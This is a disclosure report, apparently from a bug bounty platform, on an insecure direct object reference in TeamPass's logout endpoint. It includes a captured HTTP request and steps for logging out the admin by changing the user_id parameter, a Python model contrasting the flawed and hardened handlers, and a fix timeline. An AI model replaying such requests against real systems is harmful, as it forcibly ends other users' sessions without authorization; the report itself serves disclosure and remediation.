IDOR Vulnerability Allows a Low-Privilege User to Log Out Everyone, Including the Admin, in nilsteampassnet/teampass
Feb 28th 2023
An IDOR (insecure direct object reference) in the logout endpoint allows a low-privilege user to log out any user in the system, the admin included, simply by changing the user_id parameter of the logout request.
Proof of Concept
Step 1: Log in as admin.
Step 2: Go to Users and add a user. Set the role to Default.
Step 3: Log in as the new user.
Step 4: Log the new user out and capture the request:
GET /teampass/includes/core/logout.php?user_id=10000001 HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Referer: http://localhost/teampass/index.php?page=items
Cookie: 4a5b833fa554df2e84c76e5cd45ce14cd307ceebac65bd2722=569d0d699362872a0cb318b102a9c98e6e36a30f11823ec5a1; teampass_session=r511n6jfa0dqvm7jpjcipmdc1a; jstree_select=2
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Change user_id to any other user's ID while still sending the low-privilege user's own session cookie. In this example we use 1, the admin's user_id.
The response to that request is shown in the report's screenshot (not reproduced here).
Step 5: The admin has been logged out.
An attacker can log everyone out of the system without the victims knowing. The endpoint never checks that the user_id in the query string belongs to the caller, so any authenticated account can terminate any other account's session. The impact is a forced logout of arbitrary users (a session denial of service); the attacker does not obtain the victim's session.
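The following is an added illustration of the authorization mistake above and of the check that prevents it; it is not TeamPass code and not the project's actual fix. It models an in-memory session store with a logout handler that, like the reported endpoint, terminates whichever user_id the request names, beside a hardened handler that takes the identity from the session, lets only an admin name another user, and requires a per-session CSRF token for the state change. The role names, the admin-only override and the CSRF scheme are assumptions; the user IDs 1 and 10000001 are the ones from the report.

```python
"""Model of the logout IDOR reported against TeamPass.

Constructed example: an in-memory session store with a vulnerable logout handler
that terminates whichever user_id the request names, beside a hardened handler
that only terminates the caller's own session (an admin may name another user).
Not TeamPass code; user IDs, roles and the CSRF scheme are assumptions.
"""
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    sid: str
    user_id: int
    role: str                      # "admin" or "default" (assumed role names)
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


class SessionStore:
    """One active session per user, looked up by cookie value or by user_id."""

    def __init__(self):
        self._by_sid = {}
        self._by_user = {}

    def login(self, user_id, role):
        session = Session(secrets.token_urlsafe(24), user_id, role)
        self._by_sid[session.sid] = session
        self._by_user[user_id] = session
        return session

    def caller(self, cookie_sid):
        return self._by_sid.get(cookie_sid)

    def is_logged_in(self, user_id):
        return user_id in self._by_user

    def destroy(self, user_id):
        session = self._by_user.pop(user_id, None)
        if session is not None:
            self._by_sid.pop(session.sid, None)


def vulnerable_logout(store, cookie_sid, query):
    """Mirrors the reported behaviour: the object reference (user_id) comes from
    the query string and is never compared with the caller's identity."""
    if store.caller(cookie_sid) is None:
        return 401
    store.destroy(int(query["user_id"]))   # IDOR: any authenticated user picks the victim
    return 200


def hardened_logout(store, cookie_sid, query, form):
    """Identity comes from the session, not the request. A user_id that differs
    from the caller's is honoured only for admins, and the state change requires
    a per-session CSRF token (so it cannot be triggered by a bare GET link either)."""
    caller = store.caller(cookie_sid)
    if caller is None:
        return 401
    if not hmac.compare_digest(form.get("csrf_token", ""), caller.csrf_token):
        return 403
    target = caller.user_id
    if "user_id" in query and int(query["user_id"]) != caller.user_id:
        if caller.role != "admin":
            return 403                     # low-privilege caller may not name another user
        target = int(query["user_id"])
    store.destroy(target)
    return 200


def demo():
    """Replay the report's scenario against both handlers; returns the observations."""
    store = SessionStore()
    store.login(1, "admin")                        # user_id 1 is the admin in the report
    low = store.login(10000001, "default")         # the newly created Default-role user
    vuln_status = vulnerable_logout(store, low.sid, {"user_id": "1"})
    admin_alive_after_vuln = store.is_logged_in(1)

    store = SessionStore()
    store.login(1, "admin")
    low = store.login(10000001, "default")
    hard_status = hardened_logout(store, low.sid, {"user_id": "1"},
                                  {"csrf_token": low.csrf_token})
    admin_alive_after_hard = store.is_logged_in(1)
    self_status = hardened_logout(store, low.sid, {}, {"csrf_token": low.csrf_token})
    return {
        "vuln_status": vuln_status,                        # 200
        "admin_alive_after_vuln": admin_alive_after_vuln,  # False: admin forced out
        "hard_status": hard_status,                        # 403
        "admin_alive_after_hard": admin_alive_after_hard,  # True
        "self_status": self_status,                        # 200: own logout still works
        "low_alive_after_self": store.is_logged_in(10000001),  # False
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The point of the hardened handler is that the victim of the logout is never chosen from attacker-controlled input unless the caller's role explicitly permits it; the CSRF token is a separate hardening that the report does not claim, added because the captured request is a plain GET with no token.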
We are processing your report and will contact the nilsteampassnet/teampass team within 24 hours. a month ago
We have contacted a member of the nilsteampassnet/teampass team and are waiting to hear back a month ago
nilsteampassnet validated this vulnerability 14 days ago
choocs has been awarded the disclosure bounty
The fix bounty is now up for grabs
nilsteampassnet marked this as fixed in 220.127.116.11 with commit 4e06fb 14 days ago
The fix bounty has been dropped
This vulnerability has been assigned a CVE